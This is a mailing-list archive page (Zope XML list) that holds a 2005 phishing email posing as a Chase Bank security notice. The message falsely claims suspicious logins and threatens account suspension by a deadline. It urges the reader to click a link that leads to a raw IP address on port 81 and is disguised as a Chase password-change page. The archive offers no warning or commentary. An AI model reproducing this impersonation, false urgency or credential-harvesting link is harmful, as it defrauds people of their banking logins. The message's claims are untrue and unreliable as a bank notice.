Mailing List Archive: Zope: XML

Password Change Required

Zope xml RSS feed   Index | Next | Previous | View Threaded

profile at chase

Oct 11, 2005, 9:45 AM

Password Change Required

Untitled Document

Password change required!
Dear sir,

We recently have determined that different computers have logged onto your Chase user profile account, and multiple password failures were present before the logons. We strongly advice CHANGE YOUR PASSWORD.

If this is not completed by October 15, 2005, we will be forced to suspend your account indefinitely, as it may have been used for fraudulent purposes. Thank you for your cooperation.

http://202.154.225.152:81/.profile/index.php?prospect_nfpb=trueportlet_signup_1_actionOverrideFchaseonlineFsignupFverifyDetails_windowLabel_portlet_signup_pageLabel_page_signup"]Click here to Change Your Password

Thank you for your prompt attention to this matter.

We apologize for any inconvenience.

Thank you for using Chase!
Please do not reply to this e-mail. Mail sent to this address cannot be answered.

Zope xml RSS feed   Index | Next | Previous | View Threaded